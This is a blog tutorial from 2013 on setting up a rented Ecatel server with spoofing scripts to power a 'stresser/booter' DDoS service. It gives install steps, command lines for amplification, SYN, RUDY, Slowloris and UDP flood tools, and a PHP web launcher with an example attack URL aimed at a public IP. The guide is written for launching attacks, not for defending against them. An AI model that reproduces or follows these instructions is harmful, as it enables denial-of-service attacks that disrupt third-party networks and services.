How To Setup An Ecatel Server For Spoofing - Knowledge Is Free

Latest

Computer Tips, Tricks & Hacks.

BANNER 728X90

Sunday, 6 October 2013

How To Setup An Ecatel Server For Spoofing


Hello and welcome to my Tutorial on how to setup an Ecatel for using it for you Stresser/Booter. I will try my best to provide you any information about this besides the server. You can purchase a server from Ecatel here
(select centos 6 as the operation system)

First you must download the following:
Server Files
WinSCP
Putty

Step 1:
Now that you've download the files, install WinSCP and
open it. You will see a screen asking for your
server host name, username, and password.
Fill in the correct information and hit "Login".

Step 2:
After you're logged in you need to copy all the files
in the "Spoof - Asylum" folder to your root directory.
Now you need to run the following command to set
the execute permissions for setup.pl


Code:

chmod +x benchmark.pl

Step 3: (optional): 
Before continuing it is recommended that run the
following command, but not required. 


Code:
yum update
Step 4:
Now it is time to install all the required packages
to your server. Lucky for you, I have made a perl
script that makes this the easiest thing ever. Simply
type in the following command to start the setup.


Code:
./setup.pl
It will ask you if you would like to install the
required packages, now assuming this is a new
server that you haven't done anything on yet
you're going to want to select "y". Even if it
is an old server you're using, it won't run to run
it anyway.



Once that is done it will ask you if you'd like
to install SSH2, if you're planning on using
this server with a stresser, or if you'd like to
send commands via your web browser SSH2 is
required.



During this installation it will ask you if for your
libssh2 prefix, you can simply click enter here
and it will autodetect it.



Once SSH2 is finished installing it will ask you
if you'd like to compile the scripts. If you haven't
done this yet, it is required for the scripts to
work correctly.



Once that is finished, you're done! You can use the scripts from command line or keep reading if you'd like to learn how to setup
a php file to run the commands for you. 

Usage:

Code:

./amp 127.0.0.1 list.txt 2 -1 300
./essyn 127.0.0.1 80 2 -1 300
./arme 127.0.0.1 10 proxies.txt 300
./rudy 127.0.0.1 1 10 proxies.txt 300 0
./slow 127.0.0.1 25 proxies.txt 300
./udplag 127.0.0.1 list.txt 10 -1 300


Step 5:
Now I will showyou how to setup a php file so you
can send attacks from your web browser or stresser.
First thing you need to do is move the "launch.php" from
the root directory to /var/www/html using WinSCP.
Once that is done, open the file and edit the following:




Step 6:
After you edit the file to contain your servers
details you can use it to send attacks.
Usage for the file is as follows:
(replace 127.0.0.1 with your servers IP)


Code:
http://www.127.0.0.1/launch.php?target=8.8.8.8&port=80&time=120&method=udp
Different methods:
UDP = UDP
SSYN = SSYN
ARME = ARME
RUDY = RUDY
SLOWLORIS = SLOW
UDP LAG = UDPLAG

Alright I think that's everything, if you see I've
left out something out or have any questions/issues
please post below and I will do my best to help!

No comments:

Post a Comment